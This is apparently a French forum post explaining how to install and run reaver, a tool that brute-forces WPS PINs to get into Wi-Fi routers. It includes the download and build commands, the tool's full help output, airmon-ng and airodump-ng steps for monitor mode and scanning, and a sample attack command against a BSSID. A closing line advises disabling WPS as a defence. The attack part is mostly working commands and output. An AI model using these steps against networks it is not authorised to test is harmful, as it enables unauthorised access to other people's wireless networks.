(Je reprend en partie la news pour ne pas perdre la fil)
Le WPS (Wi-Fi Protected Setup) est un standard de réseau local sans fil simple et sécurisé, il permet de se connecter facilement à une box pour ensuite y configurer une sécurité WPA par exemple.
Seulement certaines box ont encore ce système d'authentification activé par défaut... Cependant Craig Heffner de Tactical Network Solutions à conçu un petit tool appelé reaver et permet de tester un certain nombre de possibilités pour s'y connecter.
Je vais vous expliquez comment l'installer sur votre OS.
Installation
Ouvrir une fenêtre de terminal
Télecharger la dernière version de reaver (actuellement la 1.2)
Décompresser
Se placer dans le dossier /reaver-1.2/src/
Configurer
Compiler
Installer
Vous pouvez lancer le tool pour voir les options et commandes à votre disposition
Voici les choix qui s'offrent à vous
Utilisation
Détecter les interfaces Wifi
Scanner les réseaux Wifi (wlan0 est le nom de ma carte, modifiez au besoin)
Repérez votre BSSID
Passer votre carte en mode monitor
Essayez l'exemple de reaver cité plus haut, vous pouvez la modifier au besoin.
Entrez votre BSSID lors de la phase "Scanner les réseaux Wifi"
D'après plusieurs retours, l'opération prend entre 4h et 10h.
Désactiver le service WPS sur votre routeur si vous ne voulez pas être victime de ce tool.
Le WPS (Wi-Fi Protected Setup) est un standard de réseau local sans fil simple et sécurisé, il permet de se connecter facilement à une box pour ensuite y configurer une sécurité WPA par exemple.
Seulement certaines box ont encore ce système d'authentification activé par défaut... Cependant Craig Heffner de Tactical Network Solutions à conçu un petit tool appelé reaver et permet de tester un certain nombre de possibilités pour s'y connecter.
Je vais vous expliquez comment l'installer sur votre OS.
Installation
Ouvrir une fenêtre de terminal
Télecharger la dernière version de reaver (actuellement la 1.2)
Code:
wget http://reaver-wps.googlecode.com/files/reaver-1.2.tar.gz
Code:
tar -xvzf reaver-1.2.tar.gz
Code:
cd reaver-1.2/src
Code:
./configure
Code:
make
Code:
make install
Vous pouvez lancer le tool pour voir les options et commandes à votre disposition
Code:
reaver
Code:
[email protected]:~# reaver Reaver v1.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> Required Arguments: -i, --interface=<wlan> Name of the monitor-mode interface to use -b, --bssid=<mac> BSSID of the target AP Optional Arguments: -m, --mac=<mac> MAC of the host system -e, --essid=<ssid> ESSID of the target AP -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) -o, --out-file=<file> Send output to a log file [stdout] -f, --fixed Disable channel hopping -5, --5ghz Use 5GHz 802.11 channels -v, --verbose Display non-critical warnings (-vv for more) -q, --quiet Only display critical messages -h, --help Show help Advanced Options: -d, --delay=<seconds> Set the delay between pin attempts [1] -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [315] -g, --max-attempts=<num> Quit after num pin attempts -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts -t, --timeout=<seconds> Set the receive timeout period [5] -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] -L, --ignore-locks Ignore locked state reported by the target AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet -n, --nack Target AP always sends a NACK [Auto] Example: reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
Utilisation
Détecter les interfaces Wifi
Code:
airmon-ng
Code:
airodump-ng wlan0
Passer votre carte en mode monitor
Code:
airmon-ng start wlan0
Code:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
D'après plusieurs retours, l'opération prend entre 4h et 10h.
Désactiver le service WPS sur votre routeur si vous ne voulez pas être victime de ce tool.
Commentaire